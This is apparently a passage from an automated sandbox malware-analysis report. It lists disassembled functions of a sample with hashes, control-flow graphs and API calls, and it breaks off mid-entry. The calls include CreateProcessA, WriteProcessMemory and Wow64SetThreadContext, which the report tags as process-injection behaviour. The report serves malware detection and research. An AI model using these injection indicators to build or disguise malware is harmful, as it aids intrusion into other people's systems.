                                                          • Opcode ID: 5b73f27e1de830b977d40d8a49d61eb3b59083c0cacecca460d8bbaa0eba121f
                                                          • Instruction ID: 4c9ccaa198f21dfe21da39d537dbf3823da4eb1fe7b7291de90c792a4107e6ce
                                                          • Opcode Fuzzy Hash: 5b73f27e1de830b977d40d8a49d61eb3b59083c0cacecca460d8bbaa0eba121f
                                                          • Instruction Fuzzy Hash: C70149314013044FC761EBA9EC143DEBBF4AF86310F14845DD15A972A1CA799C44D7B1
                                                          Function 06D774B0 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: 47644f89ea57a8adc154dece7b3a7e171c7743efc64a654256ad83ffa03c1aaa
                                                          • Instruction ID: 34f8c613bba7a7d6bd86793af87d6adbe198c03fe9a8c9fae9eb942de6ac8073
                                                          • Opcode Fuzzy Hash: 47644f89ea57a8adc154dece7b3a7e171c7743efc64a654256ad83ffa03c1aaa
                                                          • Instruction Fuzzy Hash: 5BB1F774E01218CFDB94CF69D484BADBBF2FB89304F1088A9D409A7255EB749D85CF41
                                                          Function 06D774A3 Relevance: 1.5, Strings: 1, Instructions: 253COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Te]q
                                                          • API String ID: 0-52440209
                                                          • Opcode ID: 750f65389f1090bf63cd3d51c184b729ae10a0d83e386d3d05d9f3200d8ac9a7
                                                          • Instruction ID: b8b207fe6ddd2b3610530ccadf5d17b4e387352a4d25849e195066fc4041fcc9
                                                          • Opcode Fuzzy Hash: 750f65389f1090bf63cd3d51c184b729ae10a0d83e386d3d05d9f3200d8ac9a7
                                                          • Instruction Fuzzy Hash: 1AB10574E01218CFDB94CFA9D484B9DBBF2FB89300F1084A9D409A7265EB749D85CF41
                                                          Function 06D70040 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: J
                                                          • API String ID: 0-1141589763
                                                          • Opcode ID: ff530946c5ad77d66bf712610fcf5ac378eaad7a61a37e1f9f4e6533e0a5e7a4
                                                          • Instruction ID: 7da49d863f14a14359c4ca5fd229442d1c7be9de3a6c2ba62acc226d319c4fb2
                                                          • Opcode Fuzzy Hash: ff530946c5ad77d66bf712610fcf5ac378eaad7a61a37e1f9f4e6533e0a5e7a4
                                                          • Instruction Fuzzy Hash: C0318AB1D156288BEB59CF6BDC4069DFAFBBFC8204F04D1AAD90CA6254DB700B818F45
                                                          Function 0717E2B0 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386674114.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_7160000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PZT
                                                          • API String ID: 0-3004033766
                                                          • Opcode ID: 4fec116304b5d8f3510152c703aca6c52fdc574147b24ea3fce4ae8700d53935
                                                          • Instruction ID: 63f54c04f94b7237be1dc608a731bf08bab5f6ee2b1369e87a670fb3d57589ea
                                                          • Opcode Fuzzy Hash: 4fec116304b5d8f3510152c703aca6c52fdc574147b24ea3fce4ae8700d53935
                                                          • Instruction Fuzzy Hash: 48310C74A01214DFEB54CF29D855B99B7F6FB49300F1085EAD90AA7391DB399D88CF04
                                                          Function 0166A041 Relevance: .1, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 101ff08c39cecc665d8ae3b186bc659329b156294bccd59027e583b0895b1abc
                                                          • Instruction ID: a5cfe16379a820415e1f81e9dfad55b2688050e915b4eb7a9b1719782c7dad9c
                                                          • Opcode Fuzzy Hash: 101ff08c39cecc665d8ae3b186bc659329b156294bccd59027e583b0895b1abc
                                                          • Instruction Fuzzy Hash: 5C51A070D4522CCBEB24CF69CD84B99B7B5BB49304F14C6E9D40AA3251DB309AC6CF51
                                                          Function 0166A067 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 85cb860a88589cf5bbc434cd37a57a54bdbf90957fc213e433d31cef04594615
                                                          • Instruction ID: 8f7771ec4417c5eb3743d7f868756f4ea59405620202908fbf58a8f3f13d68fe
                                                          • Opcode Fuzzy Hash: 85cb860a88589cf5bbc434cd37a57a54bdbf90957fc213e433d31cef04594615
                                                          • Instruction Fuzzy Hash: 1F51B270D4122CCBEB24CF69CD80B99B7B5BB49304F14C6E6D40AA3251DB309AC6CF51
                                                          Function 06099B6C Relevance: 3.8, Strings: 3, Instructions: 86COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1412 6099b6c-6099b70 1413 609a0ab-609a126 1412->1413 1414 6099b76-6099b80 1412->1414 1439 609a129 call 6e92b8a 1413->1439 1440 609a129 call 6e92b90 1413->1440 1414->1413 1419 609a12b-609a159 1420 609910f-6099118 1419->1420 1421 609a15f-609a16a 1419->1421 1422 609911a 1420->1422 1423 6099121-6099450 1420->1423 1421->1420 1425 6099059-6099080 1422->1425 1426 609908f-60990b7 1422->1426 1427 60990cf-6099101 1422->1427 1428 6099645-6099667 1422->1428 1423->1420 1429 609903b-6099044 1425->1429 1430 6099082-609908d 1425->1430 1426->1429 1433 60990b9-60990c4 1426->1433 1427->1420 1428->1420 1432 609966d-6099678 1428->1432 1436 609904d-609a623 1429->1436 1437 6099046 1429->1437 1430->1429 1432->1420 1433->1429 1436->1429 1437->1437 1439->1419 1440->1419
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: <$>$D
                                                          • API String ID: 0-588199494
                                                          • Opcode ID: f79ab0e9a46052eba6f0ab987cec940d7e86b572dbcb4938a0116be5cbc125a6
                                                          • Instruction ID: 3d6fb3d3f58b646f243f89482afdd5dcaac049068a812b436748ba387a8a66b9
                                                          • Opcode Fuzzy Hash: f79ab0e9a46052eba6f0ab987cec940d7e86b572dbcb4938a0116be5cbc125a6
                                                          • Instruction Fuzzy Hash: 4F419074A41258CFEBA4CF58C888B9DBBB2BB89304F1484AAD509B7340D7395EC9CF10
                                                          Function 06099246 Relevance: 3.8, Strings: 3, Instructions: 82COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1441 6099246-6099249 1442 609924b 1441->1442 1443 6099233-6099240 1441->1443 1445 60991eb-6099200 1442->1445 1446 609924d-6099276 1442->1446 1444 609910f-6099118 1443->1444 1447 609911a 1444->1447 1448 6099121-6099450 1444->1448 1470 6099203 call 6e92588 1445->1470 1471 6099203 call 6e92580 1445->1471 1468 6099278 1446->1468 1469 609927d-6099291 1446->1469 1451 6099059-6099080 1447->1451 1452 609908f-60990b7 1447->1452 1453 60990cf-6099101 1447->1453 1454 6099645-6099667 1447->1454 1448->1444 1450 6099205-6099226 1456 609903b-6099044 1451->1456 1457 6099082-609908d 1451->1457 1452->1456 1460 60990b9-60990c4 1452->1460 1453->1444 1454->1444 1459 609966d-6099678 1454->1459 1463 609904d-609a623 1456->1463 1464 6099046 1456->1464 1457->1456 1459->1444 1460->1456 1463->1456 1464->1464 1468->1469 1469->1444 1470->1450 1471->1450
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: +$2$6
                                                          • API String ID: 0-1188992160
                                                          • Opcode ID: 015294ecbc0eadca5ca209e8ce32c6ebe26ffbf812ccc4217fb773028f867129
                                                          • Instruction ID: 6bcf044fa6790f0289b3eaa6185d968ad576213825584a8eba98a9853c09d180
                                                          • Opcode Fuzzy Hash: 015294ecbc0eadca5ca209e8ce32c6ebe26ffbf812ccc4217fb773028f867129
                                                          • Instruction Fuzzy Hash: 5331D274985258CFDBA0CF54C888B9DBBB2BB4A344F1894EAD409B7250C7355EC5CF24
                                                          Function 06C91EA8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385221527.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6c90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: 6b1fc3570077271029cebc54a0cbc645f45e3367b24b6aedc3cc938401d00175
                                                          • Instruction ID: b8aa948e3f8ef6957d392d7857c5488d40a70272b319cfaed62c7229eeb5616e
                                                          • Opcode Fuzzy Hash: 6b1fc3570077271029cebc54a0cbc645f45e3367b24b6aedc3cc938401d00175
                                                          • Instruction Fuzzy Hash: 3A421774E10209DFDF94DBE9D45CAADB7B6FF49311F108019D952AB254C738AA42CFA0
                                                          Function 06C929D0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1808 6c929d0-6c929f8 1809 6c929fa 1808->1809 1810 6c929ff-6c92a28 1808->1810 1809->1810 1811 6c92a49 1810->1811 1812 6c92a2a-6c92a33 1810->1812 1815 6c92a4c-6c92a50 1811->1815 1813 6c92a3a-6c92a3d 1812->1813 1814 6c92a35-6c92a38 1812->1814 1816 6c92a47 1813->1816 1814->1816 1817 6c92e07-6c92e1e 1815->1817 1816->1815 1819 6c92a55-6c92a59 1817->1819 1820 6c92e24-6c92e28 1817->1820 1823 6c92a5b-6c92ab8 1819->1823 1824 6c92a5e-6c92a62 1819->1824 1821 6c92e2a-6c92e5a 1820->1821 1822 6c92e5d-6c92e61 1820->1822 1821->1822 1828 6c92e63-6c92e6c 1822->1828 1829 6c92e82 1822->1829 1832 6c92aba-6c92b2b 1823->1832 1833 6c92abd-6c92ac1 1823->1833 1826 6c92a8b-6c92aaf 1824->1826 1827 6c92a64-6c92a88 1824->1827 1826->1817 1827->1826 1834 6c92e6e-6c92e71 1828->1834 1835 6c92e73-6c92e76 1828->1835 1830 6c92e85-6c92e8b 1829->1830 1843 6c92b2d-6c92b8a 1832->1843 1844 6c92b30-6c92b34 1832->1844 1838 6c92aea-6c92afb 1833->1838 1839 6c92ac3-6c92ae7 1833->1839 1841 6c92e80 1834->1841 1835->1841 1933 6c92afe call 6ea4d40 1838->1933 1934 6c92afe call 6ea4d30 1838->1934 1839->1838 1841->1830 1852 6c92b8c-6c92be8 1843->1852 1853 6c92b8f-6c92b93 1843->1853 1848 6c92b5d-6c92b81 1844->1848 1849 6c92b36-6c92b5a 1844->1849 1848->1817 1849->1848 1865 6c92bea-6c92c4c 1852->1865 1866 6c92bed-6c92bf1 1852->1866 1858 6c92bbc-6c92bbf 1853->1858 1859 6c92b95-6c92bb9 1853->1859 1855 6c92b04-6c92b11 1863 6c92b21-6c92b22 1855->1863 1864 6c92b13-6c92b19 1855->1864 1867 6c92bc7-6c92bdf 1858->1867 1859->1858 1863->1817 1864->1863 1875 6c92c4e-6c92cb0 1865->1875 1876 6c92c51-6c92c55 1865->1876 1870 6c92c1a-6c92c32 1866->1870 1871 6c92bf3-6c92c17 1866->1871 1867->1817 1885 6c92c42-6c92c43 1870->1885 1886 6c92c34-6c92c3a 1870->1886 1871->1870 1887 6c92cb2-6c92d14 1875->1887 1888 6c92cb5-6c92cb9 1875->1888 1881 6c92c7e-6c92c96 1876->1881 1882 6c92c57-6c92c7b 1876->1882 1896 6c92c98-6c92c9e 1881->1896 1897 6c92ca6-6c92ca7 1881->1897 1882->1881 1885->1817 1886->1885 1898 6c92d19-6c92d1d 1887->1898 1899 6c92d16-6c92d78 1887->1899 1891 6c92cbb-6c92cdf 1888->1891 1892 6c92ce2-6c92cfa 1888->1892 1891->1892 1907 6c92d0a-6c92d0b 1892->1907 1908 6c92cfc-6c92d02 1892->1908 1896->1897 1897->1817 1902 6c92d1f-6c92d43 1898->1902 1903 6c92d46-6c92d5e 1898->1903 1909 6c92d7a-6c92dd3 1899->1909 1910 6c92d7d-6c92d81 1899->1910 1902->1903 1918 6c92d6e-6c92d6f 1903->1918 1919 6c92d60-6c92d66 1903->1919 1907->1817 1908->1907 1920 6c92dfc-6c92dff 1909->1920 1921 6c92dd5-6c92df9 1909->1921 1913 6c92daa-6c92dcd 1910->1913 1914 6c92d83-6c92da7 1910->1914 1913->1817 1914->1913 1918->1817 1919->1918 1920->1817 1921->1920 1933->1855 1934->1855
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385221527.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6c90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: 9bc4abe822e4b85b9849e3ecd06453eae7da7ce909b9a0e85aefbf2d8efa0fbf
                                                          • Instruction ID: 003e92a2112c8ce7ba62259b3d5c97a5bf5d39f8dd63b65f027297c481eb5228
                                                          • Opcode Fuzzy Hash: 9bc4abe822e4b85b9849e3ecd06453eae7da7ce909b9a0e85aefbf2d8efa0fbf
                                                          • Instruction Fuzzy Hash: 3BF1B774D11208EFDF54DFA5E4986ACBBB2FF49325F604069E446AB350CB396A82CF50
                                                          Function 01665775 Relevance: 2.7, Strings: 2, Instructions: 221COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1935 1665775 1936 166579e-16657b7 1935->1936 1938 16659ad-16659c6 1936->1938 1939 16657bd-16657c8 1936->1939 1943 16659f0 1938->1943 1944 16659c8-16659d4 1938->1944 1940 1665777-166577d 1939->1940 1942 1665783-166578c 1940->1942 1945 1665795-1665796 1942->1945 1946 166578e 1942->1946 1947 16659f6-1665a25 1943->1947 1948 16659d6-16659dc 1944->1948 1949 16659de-16659e4 1944->1949 1950 1665943-1665944 1945->1950 1946->1936 1946->1938 1946->1945 1946->1950 1951 16657e1-16657f5 1946->1951 1952 16657ca-16657dc 1946->1952 1953 1665949-1665968 1946->1953 1954 16658b3-16658f6 1946->1954 1955 166587e-166589d 1946->1955 1956 16657de-16657df 1946->1956 1957 16657fa-166583d 1946->1957 1958 16658fb-166593e 1946->1958 1959 166579b-166579c 1946->1959 1960 1665b18-1665b2c 1946->1960 1961 1665a39 1946->1961 1947->1942 1973 1665a2b-1665a34 1947->1973 1963 16659ee 1948->1963 1949->1963 1950->1936 1962 1665b2e-1665b6d 1951->1962 1952->1940 1953->1955 1971 166596e-1665997 1953->1971 1954->1942 1955->1952 1974 16658a3-16658ae 1955->1974 1956->1936 1957->1961 1986 1665843-166586a 1957->1986 1958->1940 1959->1936 1960->1962 1967 1665a45-1665b13 1961->1967 1984 1665b6f-1665b78 1962->1984 1985 1665b7a-1665b83 1962->1985 1963->1947 1967->1942 1971->1942 1981 166599d-16659a8 1971->1981 1973->1942 1974->1942 1981->1942 1984->1985 1987 1665b85 1985->1987 1988 1665b8c-1665b8d 1985->1988 1986->1942 1995 1665870-1665879 1986->1995 1987->1988 1989 1665be5 1987->1989 1990 1665ba5-1665bd8 1987->1990 1991 1665b8f-1665b96 1987->1991 1988->1989 1990->1985 2000 1665bda-1665be3 1990->2000 1991->1989 1994 1665b98-1665ba3 1991->1994 1994->1985 1995->1942 2000->1985
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH]q$`Q]q
                                                          • API String ID: 0-2790359648
                                                          • Opcode ID: b907a69bba142d8d93ce34f6f7921be5248b67debee1b0712525ece04b6d5d20
                                                          • Instruction ID: 5dcf3da5cfaed2258edac85ff9f714db65c7a43b98c8ac1c200444833110f3fd
                                                          • Opcode Fuzzy Hash: b907a69bba142d8d93ce34f6f7921be5248b67debee1b0712525ece04b6d5d20
                                                          • Instruction Fuzzy Hash: 72B1EFB4D44269CFDB60CF24DC49BA9BBB9BB49351F0041EAC64AA7284DB741AC5CF09
                                                          Function 06C93968 Relevance: 2.7, Strings: 2, Instructions: 208COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2005 6c93968-6c9398d 2006 6c9398f 2005->2006 2007 6c93994-6c939b3 2005->2007 2006->2007 2008 6c939b5-6c939be 2007->2008 2009 6c939d4 2007->2009 2011 6c939c0-6c939c3 2008->2011 2012 6c939c5-6c939c8 2008->2012 2010 6c939d7-6c939db 2009->2010 2014 6c93b96-6c93bad 2010->2014 2013 6c939d2 2011->2013 2012->2013 2013->2010 2016 6c939e0-6c939e4 2014->2016 2017 6c93bb3-6c93bb7 2014->2017 2020 6c939e9-6c939ed 2016->2020 2021 6c939e6-6c93a41 2016->2021 2018 6c93bb9-6c93bdd 2017->2018 2019 6c93be0-6c93be4 2017->2019 2018->2019 2022 6c93c05 2019->2022 2023 6c93be6-6c93bef 2019->2023 2025 6c939ef-6c93a13 2020->2025 2026 6c93a16-6c93a2f 2020->2026 2029 6c93a43-6c93aa4 2021->2029 2030 6c93a46-6c93a4a 2021->2030 2027 6c93c08-6c93c0e 2022->2027 2031 6c93bf1-6c93bf4 2023->2031 2032 6c93bf6-6c93bf9 2023->2032 2025->2026 2044 6c93a37-6c93a38 2026->2044 2040 6c93aa9-6c93aad 2029->2040 2041 6c93aa6-6c93b07 2029->2041 2037 6c93a4c-6c93a70 2030->2037 2038 6c93a73-6c93a8a 2030->2038 2034 6c93c03 2031->2034 2032->2034 2034->2027 2037->2038 2049 6c93a9a-6c93a9b 2038->2049 2050 6c93a8c-6c93a92 2038->2050 2046 6c93aaf-6c93ad3 2040->2046 2047 6c93ad6-6c93aed 2040->2047 2052 6c93b09-6c93b62 2041->2052 2053 6c93b0c-6c93b10 2041->2053 2044->2014 2046->2047 2061 6c93afd-6c93afe 2047->2061 2062 6c93aef-6c93af5 2047->2062 2049->2014 2050->2049 2063 6c93b8b-6c93b8e 2052->2063 2064 6c93b64-6c93b88 2052->2064 2058 6c93b39-6c93b5c 2053->2058 2059 6c93b12-6c93b36 2053->2059 2058->2014 2059->2058 2061->2014 2062->2061 2063->2014 2064->2063
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385221527.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6c90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4']q$4']q
                                                          • API String ID: 0-3120983240
                                                          • Opcode ID: 61ae8c240f62d5286793b97da98b25517a4b73a413dc0aa159af4936b0b5e8b9
                                                          • Instruction ID: eb9f8cdb8fdcfc14d4e4753fd0fd184ae6b314a953b5dc66ebf92bcc4c61465e
                                                          • Opcode Fuzzy Hash: 61ae8c240f62d5286793b97da98b25517a4b73a413dc0aa159af4936b0b5e8b9
                                                          • Instruction Fuzzy Hash: 5D91BD74E01248CFCF98DFA9D4586EDBBB2FF49215F109029D42AB7290CB356942CF60
                                                          Function 0609922B Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: <$>
                                                          • API String ID: 0-3803789803
                                                          • Opcode ID: a6681f3e197a991812911e8cd15bd21cf094a7ed00f21adc620763b8c71cb8b8
                                                          • Instruction ID: 09d8898dc611d4eda8a2b1f543e757d529975c737a085e3ce1965b66f82b5b3f
                                                          • Opcode Fuzzy Hash: a6681f3e197a991812911e8cd15bd21cf094a7ed00f21adc620763b8c71cb8b8
                                                          • Instruction Fuzzy Hash: E8419074A41258CFDBA4DF58C888B9DBBB2BB89304F1484AAD509B7350CB395EC9CF10
                                                          Function 0609949E Relevance: 2.6, Strings: 2, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: <$>
                                                          • API String ID: 0-3803789803
                                                          • Opcode ID: 86c532f45809731361a197f8ff265b62c5240617350a5391c8a1aec956aa7886
                                                          • Instruction ID: 8e61d37f0db367abba0f2fa99d1f9f3d85636eb51f74f9d770cb70bd8f9d2a29
                                                          • Opcode Fuzzy Hash: 86c532f45809731361a197f8ff265b62c5240617350a5391c8a1aec956aa7886
                                                          • Instruction Fuzzy Hash: 76419F74A41258CFEBA4DF58C888B9DBBB2BB89304F1484AAD509B7340D7395E898F10
                                                          Function 06099563 Relevance: 2.5, Strings: 2, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2382607373.0000000006090000.00000040.00000800.00020000.00000000.sdmp, Offset: 06090000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6090000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: )$A
                                                          • API String ID: 0-955135197
                                                          • Opcode ID: 812a78a3d4cbb607655f7121acc4bfb62bf0e42188e44c8088ef584cee4a8a0a
                                                          • Instruction ID: b73dba2508b4e818635295b304d8d366ae622d96c493b3bc8ecfad3e8998b7c5
                                                          • Opcode Fuzzy Hash: 812a78a3d4cbb607655f7121acc4bfb62bf0e42188e44c8088ef584cee4a8a0a
                                                          • Instruction Fuzzy Hash: 1D21AD74A45228CFDB94DF68C848BD9BBB6FB49708F1081E9D40DA7241DB359E858F40
                                                          Function 06E9097D Relevance: 1.7, APIs: 1, Instructions: 206processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06E90B62
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 203fc011f21514f7519d2d70f9fc49db634ed03ccf619b3070b4f3205c6f04c1
                                                          • Instruction ID: 53f31bc9703b58b572ea84281a58a1dfc3629ca6ea9b70f4b83bcce9ae1c10f5
                                                          • Opcode Fuzzy Hash: 203fc011f21514f7519d2d70f9fc49db634ed03ccf619b3070b4f3205c6f04c1
                                                          • Instruction Fuzzy Hash: B8813571D003599FDF50CFA9C8817EEBBF2BF48318F548529E858A7254E7B49881CB91
                                                          Function 06E90988 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06E90B62
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 07a2d7a91d2d1ab7a7d547b2127ed8d439a4492f878c90a3cf2d299ed8b2c5ab
                                                          • Instruction ID: 177eca0edb53a049ccc99642e8c4a8333ebd300ff91b114f5f425cb904561456
                                                          • Opcode Fuzzy Hash: 07a2d7a91d2d1ab7a7d547b2127ed8d439a4492f878c90a3cf2d299ed8b2c5ab
                                                          • Instruction Fuzzy Hash: 2D813471D003598FDF50CFA9C8817EEBBF2BF48318F548529E818A7294E7B49881CB91
                                                          Function 06E91E71 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06E91F08
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: a6779e73f083a4a033e5de1058764b423e89bdc35fa079194121140d4423d71b
                                                          • Instruction ID: 741c52c6f5e875d3d52e634b1241e31ff59ecac14a3f0b564f247da93e1ee77e
                                                          • Opcode Fuzzy Hash: a6779e73f083a4a033e5de1058764b423e89bdc35fa079194121140d4423d71b
                                                          • Instruction Fuzzy Hash: A52146B19003499FCB10CFAAC881BEEBBF5FF48314F108429E918A7240C7789940CBA4
                                                          Function 06E91E78 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06E91F08
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: a67a8bf49b02fc9c1878feba0f91cfeb681519b9efd2c1cc88ddcac201e6e9cf
                                                          • Instruction ID: b783002b8e875a5d33d4a459d0c9e37de6b7da96b2790c04b22a22f3db35140e
                                                          • Opcode Fuzzy Hash: a67a8bf49b02fc9c1878feba0f91cfeb681519b9efd2c1cc88ddcac201e6e9cf
                                                          • Instruction Fuzzy Hash: D92124B59003499FCB10DFAAC985BEEBBF5FF48314F10842AE919A7240D7789944CBA4
                                                          Function 06E92580 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E92606
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2386173730.0000000006E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6e90000_IsNestedFamANDAssem.jbxd
                                                          Similarity
